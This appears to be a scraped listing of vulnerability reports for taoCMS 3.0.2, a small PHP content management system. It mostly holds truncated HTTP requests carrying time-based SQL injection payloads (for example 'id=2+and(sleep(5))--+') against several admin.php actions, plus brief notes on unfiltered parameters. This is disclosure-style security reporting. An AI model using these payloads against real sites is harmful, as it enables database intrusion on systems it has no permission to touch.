taocms
taocms copied to clipboard
taogogo
taoCMS is an incredible tiny CMS( Content Management System) , writen in PHP and support MySQL/Sqlite as the database(MIT License)
Vulnerability file address: \include\Model\Category.php  It can be seen that the update function does not filter the id. After obtaining the id with the columnsdata function, it is brought into...
This is the latest 3.0.2 version of taocms. Organize and utilize steps in two steps: **Step1:** Audit the source code E:\xxx\taocms-3.0.2\include\Model\File.php, line 96, and find that there may be arbitrary...
There is SQL blind injection at Del comment Create a comment  Log on to the background  Grab packets and modify data when deleting comments   taocms-3.0.2/admin/admin.php ...
``` POST /admin/admin.php HTTP/1.1 Host: taocms.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://taocms.test/admin/admin.php?action=comment&ctrl=lists Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9...
  ``` GET /admin/admin.php?action=admin&id=2+and(sleep(5))--+&ctrl=edit HTTP/1.1 Host: taocms.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://taocms.test/admin/admin.php?action=admin&ctrl=lists Accept-Encoding: gzip, deflate...
 ``` GET /admin/admin.php?action=link&id=1)or(sleep(5))--+&ctrl=del HTTP/1.1 Host: taocms.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://taocms.test/admin/admin.php?action=admin&ctrl=lists Accept-Encoding: gzip, deflate Accept-Language:...
 ``` GET /admin/admin.php?action=Category&id=2)and(sleep(5))--+&ctrl=del HTTP/1.1 Host: taocms.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://taocms.test/admin/admin.php?action=admin&ctrl=lists Accept-Encoding: gzip, deflate Accept-Language:...
 ``` GET /admin/admin.php?action=Category&id=2+and(sleep(5))--+&ctrl=update HTTP/1.1 Host: taocms.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://taocms.test/admin/admin.php?action=admin&ctrl=lists Accept-Encoding: gzip, deflate Accept-Language:...
 ``` GET /admin/admin.php?action=Category&id=2+and(sleep(5))--+&ctrl=edit HTTP/1.1 Host: taocms.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://taocms.test/admin/admin.php?action=admin&ctrl=lists Accept-Encoding: gzip, deflate Accept-Language:...
  ``` POST /admin/admin.php HTTP/1.1 Host: taocms.test Content-Length: 130 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://taocms.test Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83...